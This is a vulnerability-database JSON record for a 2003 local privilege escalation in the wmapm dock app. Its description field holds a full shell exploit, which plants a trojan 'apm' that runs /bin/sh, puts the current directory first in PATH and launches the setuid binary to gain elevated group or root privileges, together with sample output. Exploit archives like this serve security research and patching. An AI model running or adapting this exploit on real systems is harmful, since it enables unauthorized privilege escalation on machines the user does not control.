DATABASE RESOURCES PRICING ABOUT US

{"id": "EXPLOITPACK:4B3942D120120EC1A0B7264CD4BF8C0A", "vendorId": null, "type": "exploitpack", "bulletinFamily": "exploit", "title": "WMAPM 3.1 - Local Privilege Escalation", "description": "\nWMAPM 3.1 - Local Privilege Escalation", "published": "2003-11-08T00:00:00", "modified": "2003-11-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "Knud Erik Hojgaard", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2020-04-01T19:04:54", "viewCount": 7, "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1678959810, "score": 1684000228, "epss": 1678961154}, "_internal": {"score_hash": "64dd4d5598d385d4b87c9fe70464e7e7"}, "sourceData": "source: https://www.securityfocus.com/bid/8995/info\n\nwmapm has been reported prone to a local privilege escalation vulnerability. The vulnerability has been conjectured to result from a lack of relative path usage while the vulnerable dock app is invoking a third party binary. As a result of this, a local attacker may manipulate local path settings and have the setuid wmapm dock app erroneously invoke a trojan binary that is located in a directory that the attacker has permissions to write to.\n\n#/bin/sh\n# Pretty useless, we can mess up /etc/dumpdates or run shutdown\n# on FreeBSD systems with wmapm from ports.\n# If wmapm is installed from source we get root instead,\n# so I suppose this might be worth something(uid 0) on linux.\n# kokanin@dtors~ pkg_info | grep -i wmapm\n# wmapm-3.1 Laptop battery status display for WindowMaker\n# kokanin@dtors~ ls -la `which wmapm` \n# -rwxr-sr-x 1 root operator 41892 Mar 23 10:00 /usr/X11R6/bin/wmapm\n# kokanin@dtors~ sh DSR-wmapm.sh\n# press the S button when wmapm starts\n# $ /usr/bin/id\n# uid=1001(kokanin) gid=1001(kokanin) egid=5(operator) groups=5(operator), 1001(kokanin), 0(wheel), 666(lewsers)\necho \"/bin/sh\" > apm\nchmod +x ./apm\necho \"press the S button(not the key, the BUTTON, in the PROGRAM) when wmapm starts\"\nexport PATH=.:$PATH\n/usr/X11R6/bin/wmapm\nrm ./apm", "affectedSoftware": [], "appercut": {}, "exploitpack": {"type": "local", "platform": "linux"}, "hackapp": {}, "toolHref": "", "w3af": {}}

{}